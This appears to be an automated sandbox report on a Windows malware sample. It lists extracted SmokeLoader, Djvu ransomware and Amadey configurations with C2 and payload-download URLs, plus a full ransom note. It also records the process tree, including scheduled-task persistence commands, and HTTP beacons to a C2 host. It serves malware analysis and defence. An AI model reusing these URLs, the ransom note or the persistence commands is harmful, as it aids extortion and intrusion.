Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-1703_x64
  • resource
    win10-20230220-en
  • resource tags

    arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system
  • submitted
    19-03-2023 04:07

General

  • Target

    48386627bb56557498183b4a2ebe0ead01561f426cf8672499b8578e3e3a6b89.exe

  • Size

    329KB

  • MD5

    482370bdb5d8d4f02a8cbf7ea6d2f921

  • SHA1

    bc510810fb16d3edfb4e1385fb1de7efee25bd1c

  • SHA256

    48386627bb56557498183b4a2ebe0ead01561f426cf8672499b8578e3e3a6b89

  • SHA512

    f3d234fb588113dbc0bc5e4bd1da310039eba564119706e20d9e71781593767822d11f1431f68cde74dbc4ee742e29e1a769f517674f5ceb382aa6cffc4fc6ad

  • SSDEEP

    3072:CmYli8H1CLQF3upMfss0/cmIESLLFnGVzO6yhpWToU6xRV/t95OMfH:/YrH1CL03u9s05WGJYhsToUWvgMfH

Malware Config

Extracted

Family

smokeloader

Version

2022

C2

http://potunulit.org/

http://hutnilior.net/

http://bulimu55t.net/

http://soryytlic4.net/

http://novanosa5org.org/

http://nuljjjnuli.org/

http://tolilolihul.net/

http://somatoka51hub.net/

http://hujukui3.net/

http://bukubuka1.net/

http://golilopaster.org/

http://newzelannd66.org/

http://otriluyttn.org/

rc4.i32
1
0xcc4f5fd4
rc4.i32
1
0x2a68f03e

Extracted

Family

djvu

C2

http://zexeq.com/test2/get.php

http://zexeq.com/lancer/get.php

Attributes
  • extension

    .dapo

  • offline_id

    8EM6M9LqEzIk18qaQ87WiPQ1u84RRdej5V1ovht1

  • payload_url

    http://uaery.top/dl/build2.exe

    http://zexeq.com/files/1/build3.exe

  • ransomnote

    ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-vbVkogQdu2 Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@freshmail.top Reserve e-mail address to contact us: datarestorehelp@airmail.cc Your personal ID: 0667JOsie

rsa_pubkey.plain
1
-----BEGIN PUBLIC KEY-----
2
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1XsvYBYqrrFQAe9QOj9l
3
I3YKXydcKqpSpI/JHJs6YR0uN6kuOa3gssxZ7CTdXx91uLdxSo2ScCIG7oNh4k+D
4
Jbe+pdEEg/gUFhn8Z4X9JZuWEFlhREqP/QuXCj4UO0O7JgkFrabCllkxrzSKm1eZ
5
VF/xRRd/8XT0nMBWKhPSp8Kl9tlvuK95+kpDDnITN87dS7jNMkys9Uq0McyT70iA
6
kBuvtsYiNNrMWBkVbnUVOSISOTqUQ7imknlPwuCRjwiYo+IPRIoZFzgru1cYCm+F
7
gezhwwU/idFEWoaXdaA17EsGjhYKfAWmbONnSpEpX8a5Q9rj9XpZ8EiwecRZJ3Pi
8
5wIDAQAB
9
-----END PUBLIC KEY-----

Extracted

Family

amadey

Version

3.65

C2

77.73.134.27/8bmdh3Slb2/index.php

Extracted

Family

smokeloader

Botnet

pub1

Extracted

Family

smokeloader

Botnet

sprg

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Detect rhadamanthys stealer shellcode 3 IoCs
  • Detected Djvu ransomware 18 IoCs
  • Detects PseudoManuscrypt payload 37 IoCs
  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • PseudoManuscrypt

    PseudoManuscrypt is a malware Lazarus’s Manuscrypt targeting government organizations and ICS.

  • Rhadamanthys

    Rhadamanthys is an info stealer written in C++ first seen in August 2022.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Deletes itself 1 IoCs
  • Executes dropped EXE 39 IoCs
  • Loads dropped DLL 5 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unexpected DNS network traffic destination 1 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 8 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 11 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 14 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 26 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 16 IoCs
  • Modifies registry class 64 IoCs
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: MapViewOfSection 21 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Themes
    1⤵
      PID:1280
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
      1⤵
        PID:2504
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s WpnService
        1⤵
          PID:2564
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Browser
          1⤵
          • Suspicious use of SetThreadContext
          • Modifies registry class
          • Suspicious use of AdjustPrivilegeToken
          PID:2396
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k WspService
            2⤵
            • Drops file in System32 directory
            • Checks processor information in registry
            • Modifies data under HKEY_USERS
            • Modifies registry class
            • Suspicious behavior: GetForegroundWindowSpam
            PID:760
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2232
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2216
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
          1⤵
            PID:1864
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s SENS
            1⤵
              PID:1456
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s UserManager
              1⤵
                PID:1376
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                1⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:1132
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                1⤵
                • Drops file in System32 directory
                • Suspicious use of AdjustPrivilegeToken
                PID:1056
                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                  2⤵
                  • Executes dropped EXE
                  PID:4396
                  • C:\Windows\SysWOW64\schtasks.exe
                    /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                    3⤵
                    • Creates scheduled task(s)
                    PID:1956
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                1⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:60
              • C:\Users\Admin\AppData\Local\Temp\48386627bb56557498183b4a2ebe0ead01561f426cf8672499b8578e3e3a6b89.exe
                "C:\Users\Admin\AppData\Local\Temp\48386627bb56557498183b4a2ebe0ead01561f426cf8672499b8578e3e3a6b89.exe"
                1⤵
                • Checks SCSI registry key(s)
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious behavior: MapViewOfSection
                PID:1008
              • C:\Users\Admin\AppData\Local\Temp\D892.exe
                C:\Users\Admin\AppData\Local\Temp\D892.exe
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:1528
                • C:\Users\Admin\AppData\Local\Temp\D892.exe
                  C:\Users\Admin\AppData\Local\Temp\D892.exe
                  2⤵
                  • Executes dropped EXE
                  • Adds Run key to start application
                  PID:2808
                  • C:\Windows\SysWOW64\icacls.exe
                    icacls "C:\Users\Admin\AppData\Local\0b95f0a2-0096-4715-9678-79624e8cd7f9" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                    3⤵
                    • Modifies file permissions
                    PID:1888
                  • C:\Users\Admin\AppData\Local\Temp\D892.exe
                    "C:\Users\Admin\AppData\Local\Temp\D892.exe" --Admin IsNotAutoStart IsNotTask
                    3⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    PID:3456
                    • C:\Users\Admin\AppData\Local\Temp\D892.exe
                      "C:\Users\Admin\AppData\Local\Temp\D892.exe" --Admin IsNotAutoStart IsNotTask
                      4⤵
                      • Executes dropped EXE
                      PID:3980
                      • C:\Users\Admin\AppData\Local\20fe431f-5449-4e06-b0a8-65b4780bb245\build2.exe
                        "C:\Users\Admin\AppData\Local\20fe431f-5449-4e06-b0a8-65b4780bb245\build2.exe"
                        5⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        PID:3792
                        • C:\Users\Admin\AppData\Local\20fe431f-5449-4e06-b0a8-65b4780bb245\build2.exe
                          "C:\Users\Admin\AppData\Local\20fe431f-5449-4e06-b0a8-65b4780bb245\build2.exe"
                          6⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          PID:3468
                      • C:\Users\Admin\AppData\Local\20fe431f-5449-4e06-b0a8-65b4780bb245\build3.exe
                        "C:\Users\Admin\AppData\Local\20fe431f-5449-4e06-b0a8-65b4780bb245\build3.exe"
                        5⤵
                        • Executes dropped EXE
                        PID:4624
                        • C:\Windows\SysWOW64\schtasks.exe
                          /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                          6⤵
                          • Creates scheduled task(s)
                          PID:4312
              • C:\Users\Admin\AppData\Local\Temp\DBEE.exe
                C:\Users\Admin\AppData\Local\Temp\DBEE.exe
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:2292
                • C:\Users\Admin\AppData\Local\Temp\DBEE.exe
                  C:\Users\Admin\AppData\Local\Temp\DBEE.exe
                  2⤵
                  • Executes dropped EXE
                  PID:4648
                  • C:\Users\Admin\AppData\Local\Temp\DBEE.exe
                    "C:\Users\Admin\AppData\Local\Temp\DBEE.exe" --Admin IsNotAutoStart IsNotTask
                    3⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    PID:5084
                    • C:\Users\Admin\AppData\Local\Temp\DBEE.exe
                      "C:\Users\Admin\AppData\Local\Temp\DBEE.exe" --Admin IsNotAutoStart IsNotTask
                      4⤵
                      • Executes dropped EXE
                      PID:3928
                      • C:\Users\Admin\AppData\Local\51e619d9-0e91-4064-a350-72fdedb68cce\build2.exe
                        "C:\Users\Admin\AppData\Local\51e619d9-0e91-4064-a350-72fdedb68cce\build2.exe"
                        5⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        PID:2192
                        • C:\Users\Admin\AppData\Local\51e619d9-0e91-4064-a350-72fdedb68cce\build2.exe
                          "C:\Users\Admin\AppData\Local\51e619d9-0e91-4064-a350-72fdedb68cce\build2.exe"
                          6⤵
                          • Executes dropped EXE
                          PID:1536
                      • C:\Users\Admin\AppData\Local\51e619d9-0e91-4064-a350-72fdedb68cce\build3.exe
                        "C:\Users\Admin\AppData\Local\51e619d9-0e91-4064-a350-72fdedb68cce\build3.exe"
                        5⤵
                        • Executes dropped EXE
                        PID:708
                        • C:\Windows\SysWOW64\schtasks.exe
                          /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                          6⤵
                          • Creates scheduled task(s)
                          PID:3264
              • C:\Users\Admin\AppData\Local\Temp\ED55.exe
                C:\Users\Admin\AppData\Local\Temp\ED55.exe
                1⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:1472
                • C:\Users\Admin\AppData\Local\Temp\zyy.exe
                  "C:\Users\Admin\AppData\Local\Temp\zyy.exe"
                  2⤵
                  • Executes dropped EXE
                  • Modifies registry class
                  • Suspicious use of SetWindowsHookEx
                  • Suspicious use of WriteProcessMemory
                  PID:3544
                  • C:\Users\Admin\AppData\Local\Temp\zyy.exe
                    "C:\Users\Admin\AppData\Local\Temp\zyy.exe" -h
                    3⤵
                    • Executes dropped EXE
                    • Modifies registry class
                    • Suspicious use of SetWindowsHookEx
                    PID:4884
                • C:\Users\Admin\AppData\Local\Temp\ss31.exe
                  "C:\Users\Admin\AppData\Local\Temp\ss31.exe"
                  2⤵
                  • Executes dropped EXE
                  PID:2248
                • C:\Users\Admin\AppData\Local\Temp\Player3.exe
                  "C:\Users\Admin\AppData\Local\Temp\Player3.exe"
                  2⤵
                  • Executes dropped EXE
                  PID:4164
              • C:\Users\Admin\AppData\Local\Temp\F053.exe
                C:\Users\Admin\AppData\Local\Temp\F053.exe
                1⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:2328
                • C:\Users\Admin\AppData\Local\Temp\zyy.exe
                  "C:\Users\Admin\AppData\Local\Temp\zyy.exe"
                  2⤵
                  • Executes dropped EXE
                  • Modifies registry class
                  • Suspicious use of SetWindowsHookEx
                  • Suspicious use of WriteProcessMemory
                  PID:3708
                  • C:\Users\Admin\AppData\Local\Temp\zyy.exe
                    "C:\Users\Admin\AppData\Local\Temp\zyy.exe" -h
                    3⤵
                    • Executes dropped EXE
                    • Modifies registry class
                    • Suspicious use of SetWindowsHookEx
                    PID:5012
                • C:\Users\Admin\AppData\Local\Temp\ss31.exe
                  "C:\Users\Admin\AppData\Local\Temp\ss31.exe"
                  2⤵
                  • Executes dropped EXE
                  PID:2576
                • C:\Users\Admin\AppData\Local\Temp\Player3.exe
                  "C:\Users\Admin\AppData\Local\Temp\Player3.exe"
                  2⤵
                  • Executes dropped EXE
                  PID:4132
              • C:\Users\Admin\AppData\Local\Temp\F65F.exe
                C:\Users\Admin\AppData\Local\Temp\F65F.exe
                1⤵
                • Executes dropped EXE
                • Checks SCSI registry key(s)
                • Suspicious behavior: MapViewOfSection
                PID:4776
              • C:\Users\Admin\AppData\Local\Temp\F835.exe
                C:\Users\Admin\AppData\Local\Temp\F835.exe
                1⤵
                • Executes dropped EXE
                PID:3392
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3392 -s 476
                  2⤵
                  • Program crash
                  PID:4984
              • C:\Windows\system32\rundll32.exe
                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
                1⤵
                • Process spawned unexpected child process
                • Suspicious use of WriteProcessMemory
                PID:3400
                • C:\Windows\SysWOW64\rundll32.exe
                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
                  2⤵
                  • Loads dropped DLL
                  • Modifies registry class
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5100
              • C:\Windows\system32\rundll32.exe
                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
                1⤵
                • Process spawned unexpected child process
                • Suspicious use of WriteProcessMemory
                PID:556
                • C:\Windows\SysWOW64\rundll32.exe
                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
                  2⤵
                  • Loads dropped DLL
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4524
              • C:\Users\Admin\AppData\Local\Temp\7C6.exe
                C:\Users\Admin\AppData\Local\Temp\7C6.exe
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                PID:4264
                • C:\Users\Admin\AppData\Local\Temp\7C6.exe
                  C:\Users\Admin\AppData\Local\Temp\7C6.exe
                  2⤵
                  • Executes dropped EXE
                  PID:2644
                  • C:\Users\Admin\AppData\Local\Temp\7C6.exe
                    "C:\Users\Admin\AppData\Local\Temp\7C6.exe" --Admin IsNotAutoStart IsNotTask
                    3⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    PID:3264
                    • C:\Users\Admin\AppData\Local\Temp\7C6.exe
                      "C:\Users\Admin\AppData\Local\Temp\7C6.exe" --Admin IsNotAutoStart IsNotTask
                      4⤵
                      • Executes dropped EXE
                      PID:4164
                      • C:\Users\Admin\AppData\Local\a3c9dfac-58d7-4c98-91ca-5cd04cc95d5f\build2.exe
                        "C:\Users\Admin\AppData\Local\a3c9dfac-58d7-4c98-91ca-5cd04cc95d5f\build2.exe"
                        5⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        PID:1080
                        • C:\Users\Admin\AppData\Local\a3c9dfac-58d7-4c98-91ca-5cd04cc95d5f\build2.exe
                          "C:\Users\Admin\AppData\Local\a3c9dfac-58d7-4c98-91ca-5cd04cc95d5f\build2.exe"
                          6⤵
                          • Executes dropped EXE
                          PID:4108
                      • C:\Users\Admin\AppData\Local\a3c9dfac-58d7-4c98-91ca-5cd04cc95d5f\build3.exe
                        "C:\Users\Admin\AppData\Local\a3c9dfac-58d7-4c98-91ca-5cd04cc95d5f\build3.exe"
                        5⤵
                        • Executes dropped EXE
                        PID:3924
                        • C:\Windows\SysWOW64\schtasks.exe
                          /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                          6⤵
                          • Creates scheduled task(s)
                          PID:3716
              • C:\Users\Admin\AppData\Local\Temp\10DF.exe
                C:\Users\Admin\AppData\Local\Temp\10DF.exe
                1⤵
                • Executes dropped EXE
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Checks SCSI registry key(s)
                PID:4168
              • C:\Users\Admin\AppData\Local\Temp\147A.exe
                C:\Users\Admin\AppData\Local\Temp\147A.exe
                1⤵
                • Executes dropped EXE
                PID:4412
              • C:\Users\Admin\AppData\Local\Temp\1A67.exe
                C:\Users\Admin\AppData\Local\Temp\1A67.exe
                1⤵
                • Executes dropped EXE
                • Checks SCSI registry key(s)
                • Suspicious behavior: MapViewOfSection
                PID:5088
              • C:\Users\Admin\AppData\Local\Temp\1C2D.exe
                C:\Users\Admin\AppData\Local\Temp\1C2D.exe
                1⤵
                • Executes dropped EXE
                PID:1484
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 1484 -s 476
                  2⤵
                  • Program crash
                  PID:4792
              • C:\Users\Admin\AppData\Local\Temp\72E9.exe
                C:\Users\Admin\AppData\Local\Temp\72E9.exe
                1⤵
                • Executes dropped EXE
                PID:5012
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\system32\rundll32.exe C:\Users\Admin\AppData\Local\Temp\Wtoahoepfise.dll,start
                  2⤵
                  • Blocklisted process makes network request
                  • Loads dropped DLL
                  • Suspicious use of SetThreadContext
                  • Checks processor information in registry
                  PID:428
                  • C:\Windows\system32\rundll32.exe
                    "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61 24140
                    3⤵
                    • Modifies registry class
                    • Suspicious use of FindShellTrayWindow
                    PID:4136
              • C:\Windows\SysWOW64\explorer.exe
                C:\Windows\SysWOW64\explorer.exe
                1⤵
                  PID:3880
                • C:\Windows\explorer.exe
                  C:\Windows\explorer.exe
                  1⤵
                    PID:2140
                  • C:\Windows\SysWOW64\explorer.exe
                    C:\Windows\SysWOW64\explorer.exe
                    1⤵
                      PID:4512
                    • C:\Windows\explorer.exe
                      C:\Windows\explorer.exe
                      1⤵
                        PID:2852
                      • C:\Windows\SysWOW64\explorer.exe
                        C:\Windows\SysWOW64\explorer.exe
                        1⤵
                          PID:4676
                        • C:\Windows\SysWOW64\explorer.exe
                          C:\Windows\SysWOW64\explorer.exe
                          1⤵
                            PID:4788
                          • C:\Windows\SysWOW64\explorer.exe
                            C:\Windows\SysWOW64\explorer.exe
                            1⤵
                              PID:3632
                            • C:\Windows\explorer.exe
                              C:\Windows\explorer.exe
                              1⤵
                                PID:1328
                              • C:\Windows\SysWOW64\explorer.exe
                                C:\Windows\SysWOW64\explorer.exe
                                1⤵
                                  PID:2636
                                • C:\Windows\System32\rundll32.exe
                                  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                  1⤵
                                    PID:4044

                                  Network

                                  • flag-us
                                    DNS
                                    potunulit.org
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    potunulit.org
                                    IN A
                                    Response
                                    potunulit.org
                                    IN A
                                    172.67.181.144
                                    potunulit.org
                                    IN A
                                    104.21.18.99
                                  • flag-us
                                    POST
                                    http://potunulit.org/
                                    Remote address:
                                    172.67.181.144:80
                                    Request
                                    POST / HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://ocnuavll.com/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 329
                                    Host: potunulit.org
                                    Response
                                    HTTP/1.1 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:07:50 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Vr8ut30TH%2B6bEHpnMrhsy6s2QLd5xQ7C0zN0LJI4Hb1jrFXBkHikkpOtWl2cDxAFaYn49nsVfvWOZ6IRfiNd46RyFsp3vXTGLwO6HJ%2FK6Mo8kpCSLSr8zFO7yJVHMzSZ"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 7aa2d9cbbca9b83d-AMS
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  • flag-us
                                    POST
                                    http://potunulit.org/
                                    Remote address:
                                    172.67.181.144:80
                                    Request
                                    POST / HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://nckoodola.org/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 250
                                    Host: potunulit.org
                                    Response
                                    HTTP/1.1 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:07:50 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BnSLkwHtx0jJ6Zrq9FLjiKWfMZ3QMkmmb%2BOGFScJi0GEkSxnbstk5dYb5PCPN1aSIyFWNxU1VtSUyWrDKGPZeaEMndqf9XNYLxTyoIJmD7%2F814BqM%2FpMEG%2F9V3pJ0UfM"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 7aa2d9ccacf8b83d-AMS
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  • flag-us
                                    POST
                                    http://potunulit.org/
                                    Remote address:
                                    172.67.181.144:80
                                    Request
                                    POST / HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://yrjbqple.com/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 154
                                    Host: potunulit.org
                                    Response
                                    HTTP/1.1 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:07:55 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=62YUKo%2BSjamCG4Dh2cbTKVRiRUXq6pV7oz1PthBxE4VvDg3bQciiOecm2Fy0ppE6VGmGZ69JJ%2Bnk8bDc7hpwpjsg0O9aExQDyJajFAiF%2Fl8sOs5gRnKWejOwnmJWWtW6"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 7aa2d9e8ff4ab83d-AMS
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  • flag-us
                                    POST
                                    http://potunulit.org/
                                    Remote address:
                                    172.67.181.144:80
                                    Request
                                    POST / HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://wouymtw.org/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 347
                                    Host: potunulit.org
                                    Response
                                    HTTP/1.1 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:07:55 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eHN1r9LzXIDfCpGebjUEey684N8ti1NjY%2FBWUTRvJp2EoIe1Xa80lfGGI54U5awCW63FRwyhWhBllJQI4bPYUS0eBZ9du1HDcdYvkhN%2BXKUvfEv7yyYPJkNmVcdSTCkj"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 7aa2d9e99f7bb83d-AMS
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  • flag-us
                                    POST
                                    http://potunulit.org/
                                    Remote address:
                                    172.67.181.144:80
                                    Request
                                    POST / HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://ypktgr.org/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 164
                                    Host: potunulit.org
                                    Response
                                    HTTP/1.1 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:07:55 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=v74hntdElGXSdEUKVJn68IAeYjwrzbTkpg5HhH0es6npWygsCBqKIhlxi63VgJdjlCqQSpQJxKwaNDNZLugLXthkDUoMcXaDEwODTDssBq8bQhGa3BXwPpBE8ocRmkjA"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 7aa2d9ea2fb4b83d-AMS
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  • flag-us
                                    POST
                                    http://potunulit.org/
                                    Remote address:
                                    172.67.181.144:80
                                    Request
                                    POST / HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://kflhin.net/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 367
                                    Host: potunulit.org
                                    Response
                                    HTTP/1.1 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:07:55 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=05CDaEniyvNPEywLB7s1k22Aks7JbO42UKmxmRV4%2FpUbLaF1xBEUm3Ro%2FkXZJabWZYs6dZKxxMrR7c1gv8NyMje95tgdg0k7fnbJZY1LsxBcDM2lmHHi2umQ%2BMpUfm4P"}],"group":"cf-nel","max_age":604800}
